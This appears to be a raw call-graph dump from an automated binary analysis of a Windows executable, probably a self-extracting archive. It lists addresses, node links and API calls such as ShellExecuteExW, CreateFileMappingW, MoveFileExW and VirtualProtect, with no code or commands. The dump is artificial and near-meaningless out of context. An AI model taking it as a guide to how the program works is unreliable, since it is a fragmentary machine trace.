__dosmaperr 24715->24729 24717 7582b4 24730 758839 26 API calls __cftof 24717->24730 24719 7582bf 24719->24698 24721 74e60e 24720->24721 24724 74e613 ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 24720->24724 24721->24724 24731 74ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24721->24731 24723 74e696 24724->24702 24725->24708 24726->24710 24727->24712 24728->24703 24729->24717 24730->24719 24731->24723 24868 731f05 126 API calls __EH_prolog 24738 74c40e 24739 74c4c7 24738->24739 24747 74c42c _wcschr 24738->24747 24740 74c4e5 24739->24740 24756 74be49 _wcsrchr 24739->24756 24773 74ce22 24739->24773 24743 74ce22 18 API calls 24740->24743 24740->24756 24742 74aa36 ExpandEnvironmentStringsW 24742->24756 24743->24756 24744 74ca8d 24745 7417ac CompareStringW 24745->24747 24747->24739 24747->24745 24748 74c11d SetWindowTextW 24748->24756 24751 7535de 22 API calls 24751->24756 24753 74bf0b SetFileAttributesW 24755 74bfc5 GetFileAttributesW 24753->24755 24765 74bf25 ___scrt_fastfail 24753->24765 24755->24756 24758 74bfd7 DeleteFileW 24755->24758 24756->24742 24756->24744 24756->24748 24756->24751 24756->24753 24759 74c2e7 GetDlgItem SetWindowTextW SendMessageW 24756->24759 24762 74c327 SendMessageW 24756->24762 24767 7417ac CompareStringW 24756->24767 24768 749da4 GetCurrentDirectoryW 24756->24768 24770 73a52a 7 API calls 24756->24770 24771 73a4b3 FindClose 24756->24771 24772 74ab9a 76 API calls ___std_exception_copy 24756->24772 24758->24756 24760 74bfe8 24758->24760 24759->24756 24761 73400a _swprintf 51 API calls 24760->24761 24763 74c008 GetFileAttributesW 24761->24763 24762->24756 24763->24760 24764 74c01d MoveFileW 24763->24764 24764->24756 24766 74c035 MoveFileExW 24764->24766 24765->24755 24765->24756 24769 73b4f7 52 API calls 2 library calls 24765->24769 24766->24756 24767->24756 24768->24756 24769->24765 24770->24756 24771->24756 24772->24756 24775 74ce2c ___scrt_fastfail 24773->24775 24774 74d08a 24774->24740 24775->24774 24776 74cf1b 24775->24776 24796 7417ac CompareStringW 24775->24796 24778 73a180 4 API calls 24776->24778 24779 74cf30 24778->24779 24780 74cf4f ShellExecuteExW 24779->24780 24797 73b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24779->24797 24780->24774 24785 74cf62 24780->24785 24782 74cf47 24782->24780 24783 74cf9b 24798 74d2e6 6 API calls 24783->24798 24784 74cff1 CloseHandle 24786 74d00a 24784->24786 24787 74cfff 24784->24787 24785->24783 24785->24784 24789 74cf91 ShowWindow 24785->24789 24786->24774 24792 74d081 ShowWindow 24786->24792 24799 7417ac CompareStringW 24787->24799 24789->24783 24791 74cfb3 24791->24784 24793 74cfc6 GetExitCodeProcess 24791->24793 24792->24774 24793->24784 24794 74cfd9 24793->24794 24794->24784 24796->24776 24797->24782 24798->24791 24799->24786 24822 74ec0b 28 API calls 2 library calls 24870 74db0b 19 API calls ___delayLoadHelper2@8 24871 74ebf7 20 API calls 24873 75abfd 6 API calls _ValidateLocalCookies 22968 74e1f9 22969 74e203 22968->22969 22972 74df59 22969->22972 23000 74dc67 22972->23000 22974 74df73 22975 74dff4 22974->22975 22976 74dfd0 22974->22976 22979 74e06c LoadLibraryExA 22975->22979 22981 74e0cd 22975->22981 22984 74e0df 22975->22984 22994 74e19b 22975->22994 22977 74ded7 DloadReleaseSectionWriteAccess 11 API calls 22976->22977 22978 74dfdb RaiseException 22977->22978 22995 74e1c9 22978->22995 22979->22981 22982 74e07f GetLastError 22979->22982 22980 74ec4a _ValidateLocalCookies 5 API calls 22983 74e1d8 22980->22983 22981->22984 22985 74e0d8 FreeLibrary 22981->22985 22986 74e092 22982->22986 22987 74e0a8 22982->22987 22988 74e13d GetProcAddress 22984->22988 22984->22994 22985->22984 22986->22981 22986->22987 22990 74ded7 DloadReleaseSectionWriteAccess 11 API calls 22987->22990 22989 74e14d GetLastError 22988->22989 22988->22994 22992 74e160 22989->22992 22991 74e0b3 RaiseException 22990->22991 22991->22995 22992->22994 22996 74ded7 DloadReleaseSectionWriteAccess 11 API calls 22992->22996 23011 74ded7 22994->23011 22995->22980 22997 74e181 RaiseException 22996->22997 22998 74dc67 ___delayLoadHelper2@8 11 API calls 22997->22998 22999 74e198 22998->22999 22999->22994 23001 74dc73 23000->23001 23002 74dc99 23000->23002 23019 74dd15 23001->23019 23002->22974 23005 74dc94 23029 74dc9a 23005->23029 23008 74df24 23009 74ec4a _ValidateLocalCookies 5 API calls 23008->23009 23010 74df55 23009->23010 23010->22974 23012 74dee9 23011->23012 23013 74df0b 23011->23013 23014 74dd15 DloadLock 8 API calls 23012->23014 23013->22995 23015 74deee 23014->23015 23016 74df06 23015->23016 23017 74de67 DloadProtectSection 3 API calls 23015->23017 23038 74df0f 8 API calls 2 library calls 23016->23038 23017->23016 23020 74dc9a DloadLock 3 API calls 23019->23020 23021 74dd2a 23020->23021 23022 74ec4a _ValidateLocalCookies 5 API calls 23021->23022 23023 74dc78 23022->23023 23023->23005 23024 74de67 23023->23024 23025 74de7c DloadObtainSection 23024->23025 23026 74deb7 VirtualProtect 23025->23026 23027 74de82 23025->23027 23037 74dd72 VirtualQuery GetSystemInfo 23025->23037 23026->23027 23027->23005 23030 74dca7 23029->23030 23031 74dcab 23029->23031 23030->23008 23032 74dcb3 GetModuleHandleW 23031->23032 23033 74dcaf 23031->23033 23034 74dcc5 23032->23034 23035 74dcc9 GetProcAddress 23032->23035 23033->23008 23034->23008 23035->23034 23036 74dcd9 GetProcAddress 23035->23036 23036->23034 23037->23026 23038->23013 23040 74aee0 23041 74aeea __EH_prolog 23040->23041 23203 73130b 23041->23203 23044 74af2c 23047 74afa2 23044->23047 23048 74af39 23044->23048 23107 74af18 23044->23107 23045 74b5cb 23275 74cd2e 23045->23275 23050 74b041 GetDlgItemTextW 23047->23050 23055 74afbc 23047->23055 23051 74af75 23048->23051 23052 74af3e 23048->23052 23050->23051 23056 74b077 23050->23056 23061 74af96 KiUserCallbackDispatcher 23051->23061 23051->23107 23060 73ddd1 53 API calls 23052->23060 23052->23107 23053 74b5f7 23057 74b600 SendDlgItemMessageW 23053->23057 23058 74b611 GetDlgItem SendMessageW 23053->23058 23054 74b5e9 SendMessageW 23054->23053 23059 73ddd1 53 API calls 23055->23059 23062 74b08f GetDlgItem 23056->23062 23201 74b080 23056->23201 23057->23058 23293 749da4 GetCurrentDirectoryW 23058->23293 23067 74afde SetDlgItemTextW 23059->23067 23068 74af58 23060->23068 23061->23107 23065 74b0a4 SendMessageW SendMessageW 23062->23065 23066 74b0c5 SetFocus 23062->23066 23064 74b641 GetDlgItem 23069 74b664 SetWindowTextW 23064->23069 23070 74b65e 23064->23070 23065->23066 23071 74b0d5 23066->23071 23086 74b0ed 23066->23086 23072 74afec 23067->23072 23315 731241 SHGetMalloc 23068->23315 23294 74a2c7 GetClassNameW 23069->23294 23070->23069 23075 73ddd1 53 API calls 23071->23075 23080 74aff9 GetMessageW 23072->23080 23072->23107 23079 74b0df 23075->23079 23076 74af5f 23081 74af63 SetDlgItemTextW 23076->23081 23076->23107 23077 74b56b 23082 73ddd1 53 API calls 23077->23082 23316 74cb5a 23079->23316 23085 74b010 IsDialogMessageW 23080->23085 23080->23107 23081->23107 23087 74b57b SetDlgItemTextW 23082->23087 23085->23072 23089 74b01f TranslateMessage DispatchMessageW 23085->23089 23091 73ddd1 53 API calls 23086->23091 23090 74b58f 23087->23090 23089->23072 23092 73ddd1 53 API calls 23090->23092 23094 74b124 23091->23094 23095 74b5b8 23092->23095 23093 74b6af 23099 74b6df 23093->23099 23104 73ddd1 53 API calls 23093->23104 23100 73400a _swprintf 51 API calls 23094->23100 23102 73ddd1 53 API calls 23095->23102 23096 74b0e6 23213 73a04f 23096->23213 23098 74bdf5 98 API calls 23098->23093 23106 74bdf5 98 API calls 23099->23106 23138 74b797 23099->23138 23101 74b136 23100->23101 23105 74cb5a 16 API calls 23101->23105 23102->23107 23111 74b6c2 SetDlgItemTextW 23104->23111 23105->23096 23112 74b6fa 23106->23112 23108 74b847 23113 74b850 EnableWindow 23108->23113 23114 74b859 23108->23114 23109 74b174 GetLastError 23110 74b17f 23109->23110 23219 74a322 SetCurrentDirectoryW 23110->23219 23116 73ddd1 53 API calls 23111->23116 23121 74b70c 23112->23121 23139 74b731 23112->23139 23113->23114 23118 74b876 23114->23118 23334 7312c8 GetDlgItem EnableWindow 23114->23334 23117 74b6d6 SetDlgItemTextW 23116->23117 23117->23099 23120 74b89d 23118->23120 23129 74b895 SendMessageW 23118->23129 23119 74b195 23124 74b1ac 23119->23124 23125 74b19e GetLastError 23119->23125 23120->23107 23130 73ddd1 53 API calls 23120->23130 23332 749635 32 API calls 23121->23332 23122 74b78a 23126 74bdf5 98 API calls 23122->23126 23133 74b237 23124->23133 23135 74b1c4 GetTickCount 23124->23135 23180 74b227 23124->23180 23125->23124 23126->23138 23128 74b86c 23335 7312c8 GetDlgItem EnableWindow 23128->23335 23129->23120 23137 74b8b6 SetDlgItemTextW 23130->23137 23131 74b725 23131->23139 23141 74b407 23133->23141 23142 74b24f GetModuleFileNameW 23133->23142 23134 74b46c 23235 7312e6 GetDlgItem ShowWindow 23134->23235 23143 73400a _swprintf 51 API calls 23135->23143 23136 74b825 23333 749635 32 API calls 23136->23333 23137->23107 23138->23108 23138->23136 23145 73ddd1 53 API calls 23138->23145 23139->23122 23146 74bdf5 98 API calls 23139->23146 23141->23051 23154 73ddd1 53 API calls 23141->23154 23326 73eb3a 80 API calls 23142->23326 23149 74b1dd 23143->23149 23145->23138 23151 74b75f 23146->23151 23147 74b47c 23236 7312e6 GetDlgItem ShowWindow 23147->23236 23220 73971e 23149->23220 23150 74b844 23150->23108 23151->23122 23155 74b768 DialogBoxParamW 23151->23155 23153 74b275 23157 73400a _swprintf 51 API calls 23153->23157 23158 74b41b 23154->23158 23155->23051 23155->23122 23156 74b486 23159 73ddd1 53 API calls 23156->23159 23160 74b297 CreateFileMappingW 23157->23160 23161 73400a _swprintf 51 API calls 23158->23161 23163 74b490 SetDlgItemTextW 23159->23163 23164 74b2f9 GetCommandLineW 23160->23164 23165 74b376 __vswprintf_c_l 23160->23165 23166 74b439 23161->23166 23237 7312e6 GetDlgItem ShowWindow 23163->23237 23170 74b30a 23164->23170 23168 74b381 ShellExecuteExW 23165->23168 23179 73ddd1 53 API calls 23166->23179 23167 74b203 23171 74b215 23167->23171 23172 74b20a GetLastError 23167->23172 23195 74b39e 23168->23195 23327 74ab2e SHGetMalloc 23170->23327 23228 739653 23171->23228 23172->23171 23173 74b4a2 SetDlgItemTextW GetDlgItem 23176 74b4d7 23173->23176 23177 74b4bf GetWindowLongW SetWindowLongW 23173->23177 23238 74bdf5 23176->23238 23177->23176 23178 74b326 23328 74ab2e SHGetMalloc 23178->23328 23179->23051 23180->23133 23180->23134 23184 74b332 23329 74ab2e SHGetMalloc 23184->23329 23185 74b3e1 23185->23141 23191 74b3f7 UnmapViewOfFile CloseHandle 23185->23191 23186 74bdf5 98 API calls 23189 74b4f3 23186->23189 23188 74b33e 23330 73ecad 80 API calls ___scrt_fastfail 23188->23330 23263 74d0f5 23189->23263 23191->23141 23194 74b355 MapViewOfFile 23194->23165 23195->23185 23197 74b3cd Sleep 23195->23197 23196 74bdf5 98 API calls 23200 74b519 23196->23200 23197->23185 23197->23195 23198 74b542 23331 7312c8 GetDlgItem EnableWindow 23198->23331 23200->23198 23202 74bdf5 98 API calls 23200->23202 23201->23051 23201->23077 23202->23198 23204 731314 23203->23204 23205 73136d 23203->23205 23207 73137a 23204->23207 23336 73da98 62 API calls 2 library calls 23204->23336 23337 73da71 GetWindowLongW SetWindowLongW 23205->23337 23207->23044 23207->23045 23207->23107 23209 731336 23209->23207 23210 731349 GetDlgItem 23209->23210 23210->23207 23211 731359 23210->23211 23211->23207 23212 73135f SetWindowTextW 23211->23212 23212->23207 23217 73a059 23213->23217 23214 73a113 23214->23109 23214->23110 23215 73a0ea 23215->23214 23216 73a207 9 API calls 23215->23216 23216->23214 23217->23214 23217->23215 23338 73a207 23217->23338 23219->23119 23221 739728 23220->23221 23222 739792 CreateFileW 23221->23222 23223 739786 23221->23223 23222->23223 23224 7397e4 23223->23224 23225 73b66c 2 API calls 23223->23225 23224->23167 23226 7397cb 23225->23226 23226->23224 23227 7397cf CreateFileW 23226->23227 23227->23224 23229 739677 23228->23229 23230 739688 23228->23230 23229->23230 23231 739683 23229->23231 23232 73968a 23229->23232 23230->23180 23385 739817 23231->23385 23390 7396d0 23232->23390 23235->23147 23236->23156 23237->23173 23239 74bdff __EH_prolog 23238->23239 23240 74b4e5 23239->23240 23405 74aa36 23239->23405 23240->23186 23243 74aa36 ExpandEnvironmentStringsW 23252 74be36 _wcsrchr 23243->23252 23244 74c11d SetWindowTextW 23244->23252 23249 74bf0b SetFileAttributesW 23251 74bfc5 GetFileAttributesW 23249->23251 23262 74bf25 ___scrt_fastfail 23249->23262 23251->23252 23254 74bfd7 DeleteFileW 23251->23254 23252->23240 23252->23243 23252->23244 23252->23249 23255 74c2e7 GetDlgItem SetWindowTextW SendMessageW 23252->23255 23258 74c327 SendMessageW 23252->23258 23409 7417ac CompareStringW 23252->23409 23410 749da4 GetCurrentDirectoryW 23252->23410 23412 73a52a 7 API calls 23252->23412 23413 73a4b3 FindClose 23252->23413 23414 74ab9a 76 API calls ___std_exception_copy 23252->23414 23415 7535de 23252->23415 23254->23252 23256 74bfe8 23254->23256 23255->23252 23257 73400a _swprintf 51 API calls 23256->23257 23259 74c008 GetFileAttributesW 23257->23259 23258->23252 23259->23256 23260 74c01d MoveFileW 23259->23260 23260->23252 23261 74c035 MoveFileExW 23260->23261 23261->23252 23262->23251 23262->23252 23411 73b4f7 52 API calls 2 library calls 23262->23411 23264 74d0ff __EH_prolog 23263->23264 23439 73fead 23264->23439 23266 74d130 23443 735c59 23266->23443 23268 74d14e 23447 737c68 23268->23447 23272 74d1a1 23464 737cfb 23272->23464 23274 74b504 23274->23196 23276 74cd38 23275->23276 23937 749d1a 23276->23937 23279 74cd45 GetWindow 23280 74b5d1 23279->23280 23283 74cd65 23279->23283 23280->23053 23280->23054 23281 74cd72 GetClassNameW 23942 7417ac CompareStringW 23281->23942 23283->23280 23283->23281 23284 74cd96 GetWindowLongW 23283->23284 23285 74cdfa GetWindow 23283->23285 23284->23285 23286 74cda6 SendMessageW 23284->23286 23285->23280 23285->23283 23286->23285 23287 74cdbc GetObjectW 23286->23287 23943 749d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23287->23943 23289 74cdd3 23944 749d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23289->23944 23945 749f5d 8 API calls ___scrt_fastfail 23289->23945 23292 74cde4 SendMessageW DeleteObject 23292->23285 23293->23064 23295 74a2e8 23294->23295 23300 74a30d 23294->23300 23948 7417ac CompareStringW 23295->23948 23296 74a312 SHAutoComplete 23297 74a31b 23296->23297 23302 74a7c3 23297->23302 23299 74a2fb 23299->23300 23301 74a2ff FindWindowExW 23299->23301 23300->23296 23300->23297 23301->23300 23303 74a7cd __EH_prolog 23302->23303 23304 731380 82 API calls 23303->23304 23305 74a7ef 23304->23305 23949 731f4f 23305->23949 23308 74a818 23310 731951 126 API calls 23308->23310 23309 74a809 23311 731631 84 API calls 23309->23311 23313 74a83a __vswprintf_c_l ___std_exception_copy 23310->23313 23312 74a814 23311->23312 23312->23093 23312->23098 23313->23312 23314 731631 84 API calls 23313->23314 23314->23312 23315->23076 23317 74ac74 5 API calls 23316->23317 23318 74cb66 GetDlgItem 23317->23318 23319 74cbbc SendMessageW SendMessageW 23318->23319 23320 74cb88 23318->23320 23321 74cc17 SendMessageW SendMessageW SendMessageW 23319->23321 23322 74cbf8 23319->23322 23323 74cb93 ShowWindow SendMessageW SendMessageW 23320->23323 23324 74cc6d SendMessageW 23321->23324 23325 74cc4a SendMessageW 23321->23325 23322->23321 23323->23319 23324->23096 23325->23324 23326->23153 23327->23178 23328->23184 23329->23188 23330->23194 23331->23201 23332->23131 23333->23150 23334->23128 23335->23118 23336->23209 23337->23207 23339 73a214 23338->23339 23340 73a238 23339->23340 23342 73a22b CreateDirectoryW 23339->23342 23359 73a180 23340->23359 23342->23340 23343 73a26b 23342->23343 23348 73a27a 23343->23348 23351 73a444 23343->23351 23345 73a27e GetLastError 23345->23348 23348->23217 23349 73a254 23349->23345 23350 73a258 CreateDirectoryW 23349->23350 23350->23343 23350->23345 23372 74e360 23351->23372 23354 73a467 23356 73b66c 2 API calls 23354->23356 23355 73a494 23355->23348 23357 73a47b 23356->23357 23357->23355 23358 73a47f SetFileAttributesW 23357->23358 23358->23355 23374 73a194 23359->23374 23362 73b66c 23363 73b679 23362->23363 23371 73b683 23363->23371 23382 73b806 CharUpperW 23363->23382 23365 73b692 23383 73b832 CharUpperW 23365->23383 23367 73b6a1 23368 73b6a5 23367->23368 23369 73b71c GetCurrentDirectoryW 23367->23369 23384 73b806 CharUpperW 23368->23384 23369->23371 23371->23349 23373 73a451 SetFileAttributesW 23372->23373 23373->23354 23373->23355 23375 74e360 23374->23375 23376 73a1a1 GetFileAttributesW 23375->23376 23377 73a1b2 23376->23377 23378 73a189 23376->23378 23379 73b66c 2 API calls 23377->23379 23378->23345 23378->23362 23380 73a1c6 23379->23380 23380->23378 23381 73a1ca GetFileAttributesW 23380->23381 23381->23378 23382->23365 23383->23367 23384->23371 23386 739820 23385->23386 23388 739824 23385->23388 23386->23230 23388->23386 23396 73a12d 23388->23396 23391 7396fa 23390->23391 23392 7396dc 23390->23392 23393 739719 23391->23393 23404 736e3e 74 API calls 23391->23404 23392->23391 23394 7396e8 CloseHandle 23392->23394 23393->23230 23394->23391 23397 74e360 23396->23397 23398 73a13a DeleteFileW 23397->23398 23399 73984c 23398->23399 23400 73a14d 23398->23400 23399->23230 23401 73b66c 2 API calls 23400->23401 23402 73a161 23401->23402 23402->23399 23403 73a165 DeleteFileW 23402->23403 23403->23399 23404->23393 23406 74aa40 23405->23406 23407 74aaf3 ExpandEnvironmentStringsW 23406->23407 23408 74ab16 23406->23408 23407->23408 23408->23252 23409->23252 23410->23252 23411->23262 23412->23252 23413->23252 23414->23252 23416 758606 23415->23416 23417 758613 23416->23417 23418 75861e 23416->23418 23428 758518 23417->23428 23420 758626 23418->23420 23426 75862f __dosmaperr 23418->23426 23421 7584de _free 20 API calls 23420->23421 23424 75861b 23421->23424 23422 758634 23435 75895a 20 API calls __dosmaperr 23422->23435 23423 758659 HeapReAlloc 23423->23424 23423->23426 23424->23252 23426->23422 23426->23423 23436 7571ad 7 API calls 2 library calls 23426->23436 23429 758556 23428->23429 23433 758526 __dosmaperr 23428->23433 23438 75895a 20 API calls __dosmaperr 23429->23438 23431 758541 RtlAllocateHeap 23432 758554 23431->23432 23431->23433 23432->23424 23433->23429 23433->23431 23437 7571ad 7 API calls 2 library calls 23433->23437 23435->23424 23436->23426 23437->23433 23438->23432 23440 73feba 23439->23440 23468 731789 23440->23468 23442 73fed2 23442->23266 23444 73fead 23443->23444 23445 731789 76 API calls 23444->23445 23446 73fed2 23445->23446 23446->23268 23448 737c72 __EH_prolog 23447->23448 23485 73c827 23448->23485 23450 737c8d 23491 74e24a 23450->23491 23452 737cb7 23497 74440b 23452->23497 23455 737ddf 23456 737de9 23455->23456 23461 737e53 23456->23461 23529 73a4c6 23456->23529 23458 737f06 23458->23272 23459 737ec4 23459->23458 23535 736dc1 74 API calls 23459->23535 23461->23459 23462 73a4c6 8 API calls 23461->23462 23507 73837f 23461->23507 23462->23461 23465 737d09 23464->23465 23467 737d10 23464->23467 23466 741acf 84 API calls 23465->23466 23466->23467 23469 73179f 23468->23469 23480 7317fa __vswprintf_c_l 23468->23480 23470 7317c8 23469->23470 23481 736e91 74 API calls __vswprintf_c_l 23469->23481 23472 731827 23470->23472 23476 7317e7 ___std_exception_copy 23470->23476 23474 7535de 22 API calls 23472->23474 23473 7317be 23482 736efd 75 API calls 23473->23482 23477 73182e 23474->23477 23476->23480 23483 736efd 75 API calls 23476->23483 23477->23480 23484 736efd 75 API calls 23477->23484 23480->23442 23481->23473 23482->23470 23483->23480 23484->23480 23486 73c831 __EH_prolog 23485->23486 23487 74e24a new 8 API calls 23486->23487 23488 73c874 23487->23488 23489 74e24a new 8 API calls 23488->23489 23490 73c898 23489->23490 23490->23450 23494 74e24f ___std_exception_copy 23491->23494 23492 74e27b 23492->23452 23494->23492 23503 7571ad 7 API calls 2 library calls 23494->23503 23504 74ecce RaiseException FindHandler new 23494->23504 23505 74ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23494->23505 23498 744415 __EH_prolog 23497->23498 23499 74e24a new 8 API calls 23498->23499 23500 744431 23499->23500 23501 737ce6 23500->23501 23506 7406ba 78 API calls 23500->23506 23501->23455 23503->23494 23506->23501 23508 738389 __EH_prolog 23507->23508 23536 731380 23508->23536 23510 7383a4 23544 739ef7 23510->23544 23516 7383d3 23667 731631 23516->23667 23517 73846e 23563 738517 23517->23563 23521 7384ce 23570 731f00 23521->23570 23522 7383cf 23522->23516 23522->23517 23527 73a4c6 8 API calls 23522->23527 23671 73bac4 CompareStringW 23522->23671 23525 7384d9 23525->23516 23574 733aac 23525->23574 23584 73857b 23525->23584 23527->23522 23530 73a4db 23529->23530 23534 73a4df 23530->23534 23925 73a5f4 23530->23925 23532 73a4ef 23533 73a4f4 FindClose 23532->23533 23532->23534 23533->23534 23534->23456 23535->23458 23537 731385 __EH_prolog 23536->23537 23538 73c827 8 API calls 23537->23538 23539 7313bd 23538->23539 23540 74e24a new 8 API calls 23539->23540 23543 731416 ___scrt_fastfail 23539->23543 23541 731403 23540->23541 23541->23543 23672 73b07d 23541->23672 23543->23510 23545 739f0e 23544->23545 23546 7383ba 23545->23546 23688 736f5d 76 API calls 23545->23688 23546->23516 23548 7319a6 23546->23548 23549 7319b0 __EH_prolog 23548->23549 23558 7319e5 23549->23558 23560 731a00 23549->23560 23689 73709d 23549->23689 23551 731b50 23692 736dc1 74 API calls 23551->23692 23553 733aac 97 API calls 23557 731bb3 23553->23557 23554 731b60 23554->23553 23554->23558 23555 731bff 23555->23558 23561 731c32 23555->23561 23693 736dc1 74 API calls 23555->23693 23557->23555 23559 733aac 97 API calls 23557->23559 23558->23522 23559->23557 23560->23551 23560->23554 23560->23558 23561->23558 23562 733aac 97 API calls 23561->23562 23562->23561 23564 738524 23563->23564 23711 740c26 GetSystemTime SystemTimeToFileTime 23564->23711 23566 738488 23566->23521 23567 741359 23566->23567 23713 74d51a 23567->23713 23572 731f05 __EH_prolog 23570->23572 23571 731f39 23571->23525 23572->23571 23721 731951 23572->23721 23575 733ab8 23574->23575 23576 733abc 23574->23576 23575->23525 23577 733af7 23576->23577 23578 733ae9 23576->23578 23856 7327e8 97 API calls 3 library calls 23577->23856 23580 733b29 23578->23580 23855 733281 85 API calls 3 library calls 23578->23855 23580->23525 23582 733af5 23582->23580 23857 73204e 74 API calls 23582->23857 23585 738585 __EH_prolog 23584->23585 23586 7385be 23585->23586 23590 7385c2 23585->23590 23880 7484bd 99 API calls 23585->23880 23587 7385e7 23586->23587 23586->23590 23593 73867a 23586->23593 23589 738609 23587->23589 23587->23590 23881 737b66 151 API calls 23587->23881 23589->23590 23882 7484bd 99 API calls 23589->23882 23590->23525 23593->23590 23858 735e3a 23593->23858 23595 738705 23595->23590 23864 73826a 23595->23864 23598 738875 23599 73a4c6 8 API calls 23598->23599 23601 7388e0 23598->23601 23599->23601 23600 73c991 80 API calls 23605 73893b _memcmp 23600->23605 23868 737d6c 23601->23868 23603 738a70 23604 738b43 23603->23604 23610 738abf 23603->23610 23609 738b9e 23604->23609 23619 738b4e 23604->23619 23605->23590 23605->23600 23605->23603 23606 738a69 23605->23606 23883 738236 82 API calls 23605->23883 23884 731f94 74 API calls 23605->23884 23885 731f94 74 API calls 23606->23885 23618 738b30 23609->23618 23888 7380ea 96 API calls 23609->23888 23612 73a180 4 API calls 23610->23612 23610->23618 23611 738b9c 23613 739653 79 API calls 23611->23613 23616 738af7 23612->23616 23613->23590 23615 739653 79 API calls 23615->23590 23616->23618 23886 739377 96 API calls 23616->23886 23617 738c09 23630 738c74 23617->23630 23666 7391c1 __except_handler4 23617->23666 23889 739989 23617->23889 23618->23611 23618->23617 23619->23611 23887 737f26 100 API calls __except_handler4 23619->23887 23620 73aa88 8 API calls 23623 738cc3 23620->23623 23626 73aa88 8 API calls 23623->23626 23625 738c4c 23625->23630 23893 731f94 74 API calls 23625->23893 23643 738cd9 23626->23643 23628 738c62 23894 737061 75 API calls 23628->23894 23630->23620 23631 738d9c 23632 738df7 23631->23632 23633 738efd 23631->23633 23634 738e69 23632->23634 23635 738e07 23632->23635 23637 738f23 23633->23637 23638 738f0f 23633->23638 23654 738e27 23633->23654 23636 73826a CharUpperW 23634->23636 23639 738e4d 23635->23639 23647 738e15 23635->23647 23640 738e84 23636->23640 23642 742c42 75 API calls 23637->23642 23641 7392e6 121 API calls 23638->23641 23639->23654 23897 737907 108 API calls 23639->23897 23650 738eb4 23640->23650 23651 738ead 23640->23651 23640->23654 23641->23654 23645 738f3c 23642->23645 23643->23631 23895 739b21 SetFilePointer GetLastError SetEndOfFile 23643->23895 23900 7428f1 121 API calls 23645->23900 23896 731f94 74 API calls 23647->23896 23899 739224 94 API calls __EH_prolog 23650->23899 23898 737698 84 API calls __except_handler4 23651->23898 23657 73904b 23654->23657 23901 731f94 74 API calls 23654->23901 23656 739156 23658 73a444 4 API calls 23656->23658 23656->23666 23657->23656 23659 739104 23657->23659 23657->23666 23874 739ebf SetEndOfFile 23657->23874 23660 7391b1 23658->23660 23875 739d62 23659->23875 23660->23666 23902 731f94 74 API calls 23660->23902 23663 73914b 23665 7396d0 75 API calls 23663->23665 23665->23656 23666->23615 23668 731643 23667->23668 23917 73c8ca 23668->23917 23671->23522 23673 73b087 __EH_prolog 23672->23673 23678 73ea80 80 API calls 23673->23678 23675 73b099 23679 73b195 23675->23679 23678->23675 23680 73b1a7 ___scrt_fastfail 23679->23680 23683 740948 23680->23683 23686 740908 GetCurrentProcess GetProcessAffinityMask 23683->23686 23687 73b10f 23686->23687 23687->23543 23688->23546 23694 7316d2 23689->23694 23691 7370b9 23691->23560 23692->23558 23693->23561 23695 731740 __vswprintf_c_l 23694->23695 23696 7316e8 23694->23696 23695->23691 23697 731711 23696->23697 23707 736e91 74 API calls __vswprintf_c_l 23696->23707 23698 731767 23697->23698 23704 73172d ___std_exception_copy 23697->23704 23701 7535de 22 API calls 23698->23701 23700 731707 23708 736efd 75 API calls 23700->23708 23702 73176e 23701->23702 23702->23695 23710 736efd 75 API calls 23702->23710 23704->23695 23709 736efd 75 API calls 23704->23709 23707->23700 23708->23697 23709->23695 23710->23695 23712 740c56 __vswprintf_c_l 23711->23712 23712->23566 23714 74d527 23713->23714 23715 73ddd1 53 API calls 23714->23715 23716 74d54a 23715->23716 23717 73400a _swprintf 51 API calls 23716->23717 23718 74d55c 23717->23718 23719 74cb5a 16 API calls 23718->23719 23720 741372 23719->23720 23720->23521 23722 731961 23721->23722 23724 73195d 23721->23724 23725 731896 23722->23725 23724->23571 23726 7318a8 23725->23726 23727 7318e5 23725->23727 23728 733aac 97 API calls 23726->23728 23733 733f18 23727->23733 23731 7318c8 23728->23731 23731->23724 23737 733f21 23733->23737 23734 733aac 97 API calls 23734->23737 23735 731906 23735->23731 23738 731e00 23735->23738 23737->23734 23737->23735 23750 74067c 23737->23750 23739 731e0a __EH_prolog 23738->23739 23758 733b3d 23739->23758 23741 731e34 23742 7316d2 76 API calls 23741->23742 23744 731ebb 23741->23744 23743 731e4b 23742->23743 23786 731849 76 API calls 23743->23786 23744->23731 23746 731e63 23748 731e6f 23746->23748 23787 74137a MultiByteToWideChar 23746->23787 23788 731849 76 API calls 23748->23788 23751 740683 23750->23751 23752 74069e 23751->23752 23756 736e8c RaiseException FindHandler 23751->23756 23754 7406af SetThreadExecutionState 23752->23754 23757 736e8c RaiseException FindHandler 23752->23757 23754->23737 23756->23752 23757->23754 23759 733b47 __EH_prolog 23758->23759 23760 733b79 23759->23760 23761 733b5d 23759->23761 23763 733dc2 23760->23763 23766 733ba5 23760->23766 23817 736dc1 74 API calls 23761->23817 23834 736dc1 74 API calls 23763->23834 23765 733b68 23765->23741 23766->23765 23789 742c42 23766->23789 23768 733c26 23769 733cb1 23768->23769 23785 733c1d 23768->23785 23820 73c991 23768->23820 23802 73aa88 23769->23802 23770 733c22 23770->23768 23819 732034 76 API calls 23770->23819 23772 733c12 23818 736dc1 74 API calls 23772->23818 23773 733bf4 23773->23768 23773->23770 23773->23772 23775 733cc4 23779 733d48 23775->23779 23780 733d3e 23775->23780 23826 7428f1 121 API calls 23779->23826 23806 7392e6 23780->23806 23783 733d46 23783->23785 23827 731f94 74 API calls 23783->23827 23828 741acf 23785->23828 23786->23746 23787->23748 23788->23744 23790 742c51 23789->23790 23792 742c5b 23789->23792 23835 736efd 75 API calls 23790->23835 23793 742ca2 ___std_exception_copy 23792->23793 23794 742c9d Concurrency::cancel_current_task 23792->23794 23801 742cfd ___scrt_fastfail 23792->23801 23796 742da9 Concurrency::cancel_current_task 23793->23796 23797 742cd9 23793->23797 23793->23801 23837 75157a RaiseException 23794->23837 23838 75157a RaiseException 23796->23838 23836 742b7b 75 API calls 4 library calls 23797->23836 23800 742dc1 23801->23773 23801->23801 23803 73aa95 23802->23803 23805 73aa9f 23802->23805 23804 74e24a new 8 API calls 23803->23804 23804->23805 23805->23775 23807 7392f0 __EH_prolog 23806->23807 23839 737dc6 23807->23839 23810 73709d 76 API calls 23811 739302 23810->23811 